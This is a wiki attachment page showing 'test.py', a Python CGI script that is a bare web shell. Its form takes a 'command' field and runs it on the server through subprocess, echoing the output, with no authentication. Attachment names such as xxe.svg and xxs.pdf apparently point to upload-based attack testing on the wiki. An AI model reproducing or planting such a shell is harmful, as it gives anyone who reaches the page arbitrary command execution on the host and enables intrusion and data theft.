Attachment 'test.py'

Download

   1 #!/usr/bin/env python
   2 
   3 import cgi
   4 import subprocess
   5 
   6 import cgitb
   7 cgitb.enable()
   8 
   9 def run(command):
  10     if not command:
  11        raise Exception("Commande vide")
  12     else:
  13        p = subprocess.Popen(command.split(), stdout=subprocess.PIPE, stderr=subprocess.PIPE)
  14        p.wait()
  15        out, err = p.communicate()
  16        return out
  17 
  18 print "Content-Type: text/html"
  19 print
  20 print "<html>"
  21 print "<head>"
  22 print "<title>Hello World</title>"
  23 print "</head>"
  24 print "<body>"
  25 print "<form method='post' action='shell.py'>"
  26 print "<input type='text' name='command' />"
  27 print "<input type='submit' value='submit' />"
  28 print "</form>"
  29 
  30 form = cgi.FieldStorage()
  31 if 'command' in form:
  32     cmd = form['command'].value
  33     print "<font face='monospace'>"
  34     print "$ %s" % cmd
  35     print "<br>"
  36     for i in run(cmd).split('\n'):
  37         print i, "<br>"
  38     print "</font>"
  39 
  40 print "</body>"
  41 print "</html>"

Attached Files

To refer to attachments on a page, use attachment:filename, as shown below in the list of files. Do NOT use the URL of the [get] link, since this is subject to change and can break easily.
  • [get | view] (2024-10-08 09:15:08, 0.4 KB) [[attachment:alert.svg]]
  • [get | view] (2009-06-09 22:42:43, 444.0 KB) [[attachment:putty.exe]]
  • [get | view] (2024-10-08 09:17:59, 0.9 KB) [[attachment:test.py]]
  • [get | view] (2009-06-09 23:22:46, 0.0 KB) [[attachment:teste111.txt]]
  • [get | view] (2024-10-08 09:37:34, 0.7 KB) [[attachment:testtt.svg]]
  • [get | view] (2024-10-08 09:34:14, 0.7 KB) [[attachment:x.svg]]
  • [get | view] (2024-10-08 09:32:42, 0.7 KB) [[attachment:xxe.svg]]
  • [get | view] (2024-10-08 09:16:54, 13.9 KB) [[attachment:xxs.pdf]]
 All files | Selected Files: delete move to page

You are not allowed to attach a file to this page.